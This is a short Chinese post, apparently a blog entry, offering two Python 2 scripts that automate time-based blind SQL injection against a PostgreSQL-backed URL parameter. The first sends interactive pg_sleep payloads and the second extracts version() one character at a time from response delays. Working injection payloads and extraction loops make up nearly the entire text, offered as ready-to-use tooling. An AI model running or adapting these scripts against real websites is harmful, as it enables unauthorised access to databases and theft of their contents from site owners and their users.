手工注入辅助脚本

注入命令构造辅助脚本

此脚本示例用于构造延时注入的请求；相对于 HackBar，不需要再用鼠标去点 EXECUTE，能提升不少效率。

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *  # 页面分析用
import sys
# Python 2 idiom: reload(sys) restores sys.setdefaultencoding (site.py removes it
# at startup) so the process-wide default string encoding can be switched to UTF-8.
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    """Send one GET to the hard-coded URL with *sqlid* appended as the
    ``propertyType`` query value and return the ``requests`` response object.

    The Host header, the base URL and the ``Cookie`` value are fixed literals
    in this function; the cookie is a dummy session string.  ``requests.get``
    is called without a ``timeout``, so a server that never answers blocks the
    caller indefinitely.
    """
    # proxy = "http://127.0.0.1:8080"
    # proxyDict = {'http': proxy}
    base_url = "https://www.baidu.com/ranTest/searchIndex?propertyType="
    request_headers = {
        "Host": "www.baidu.com",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Proxy-Connection": "keep-alive",
        "Cookie": "session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control": "max-age=0",
    }
    # Non-string ids are coerced exactly as the original did, then concatenated raw.
    target = base_url + str(sqlid)
    return requests.get(target, headers=request_headers)

def main():
    """Interactive loop: read one condition per line from stdin, splice it
    between a fixed prefix and ``;--``, send it through ``URLConnect`` and
    print the response's ``elapsed`` time.

    Entering ``exit`` terminates the process via ``exit()``; every other line
    is used verbatim as the condition.
    """
    # Alternative prefix kept for reference:
    # "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--"
    prefix = "';select%20pg_sleep(3) where 1=1 and "
    suffix = ';--'
    while True:
        com = raw_input("com: ")
        if com == 'exit':
            exit()
        full_payload = prefix + com + suffix
        print('payload: ' + full_payload)
        response = URLConnect(full_payload)
        # response.content could be parsed with BeautifulSoup here; the bs4
        # import at the top of the file is commented out.
        print(response.elapsed)
        print('\n')

# Run the interactive loop only when executed as a script, not when imported.
if __name__ == '__main__':
    main()

使用效果
构造脚本使用效果

手工注入爆破辅助脚本

用以爆破字段之类的

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *
import sys
# Python 2 idiom: reload(sys) restores sys.setdefaultencoding (site.py removes it
# at startup) so the process-wide default string encoding can be switched to UTF-8.
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    """Send one GET to the hard-coded URL with *sqlid* appended as the
    ``propertyType`` query value and return the ``requests`` response object.

    The Host header, the base URL and the ``Cookie`` value are fixed literals
    in this function; the cookie is a dummy session string.  ``requests.get``
    is called without a ``timeout``, so a server that never answers blocks the
    caller indefinitely.
    """
    # proxy = "http://127.0.0.1:8080"
    # proxyDict = {'http': proxy}
    base_url = "https://www.baidu.com/ranTest/searchIndex?propertyType="
    request_headers = {
        "Host": "www.baidu.com",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Proxy-Connection": "keep-alive",
        "Cookie": "session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control": "max-age=0",
    }
    # Non-string ids are coerced exactly as the original did, then concatenated raw.
    target = base_url + str(sqlid)
    return requests.get(target, headers=request_headers)

def main():
    """Recover ``version()`` one character at a time from response timing.

    For each position ``i`` in 0..102 (the length assumed by the outer loop
    bound) every byte value ``t`` in 0..127 is tried: the payload makes the
    server call ``pg_sleep(2)`` only when ``substr(version(), i+1, 1)`` equals
    ``chr(t)``, and the two-digit seconds field of the response's ``elapsed``
    time is the only signal used.  A match appends ``chr(t)`` to ``strs`` and
    prints the string recovered so far.

    Server-side this is a long burst of requests whose query string contains
    ``pg_sleep`` and whose latencies cluster at the sleep duration.
    """
    #payload = "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--" # probe version()
    #payload = "';select%20pg_sleep(3) where 1=1 and length(version()) = 103;--" # length of version()
    #payload = "';select%20pg_sleep(3) where 1=1 and left(version(),1) = chr(80);--" # guess one character
    strs = ""
    i = 0
    while i < 103:  # known data length
        t = 0
        while t < 128:  # guess the character at position i+1
            payload = "';select%20pg_sleep(2) where 1=1 and substr(version(),"+str(i+1)+",1) = chr("+str(t)+");--"
            #print payload
            docsGroup = URLConnect(payload)
            timec = docsGroup.elapsed #0:00:03.093413
            # str() of a timedelta looks like "0:00:03.093413"; [5:7] is the seconds field.
            # Only a reading of exactly "02" counts, so a sleep that lands at 3s or more
            # (sleep plus network latency) is treated as a miss, and no other signal is checked.
            timec = str(timec)[5:7]
            if timec == "02":
                strs = strs + chr(t)
                print strs
                break
            t = t + 1
        # If no t matched, this position is skipped silently and strs ends up shorter than i+1.
        i = i + 1

# Run the brute-force loop only when executed as a script, not when imported.
if __name__ == '__main__':
    main()

使用效果
爆破脚本使用效果

